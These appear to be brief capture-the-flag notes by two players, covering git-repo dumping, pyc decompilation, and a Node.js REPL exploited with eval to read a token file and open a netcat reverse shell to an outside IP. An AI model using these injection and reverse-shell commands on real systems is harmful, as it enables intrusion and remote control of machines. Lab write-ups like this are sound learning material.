# Diego - found public git repo with dirb - https://github.com/internetwache/GitTools - recovered two pyc files - these can be decompiled with https://pypi.org/project/uncompyle6/ - a remote shell awaits us after deobfuscating that shit - no idea how to exploit privileges though and my shell is dead now ._. # Devon - Landscape pic - Exif data - Hidden route - JS REPL - Apparently node - Eval `require('fs').readFileSync('/home/user/token.txt')` to get the flag - Reverse shell is a bit harder - Run `nc -lp 1234` on your machine - `require('child_process').exec('nc -e /bin/bash 1.2.3.4 1234')` - I tried out all kinds of things to escalate privileges, but no luck - This was supposed to be a nginx exploit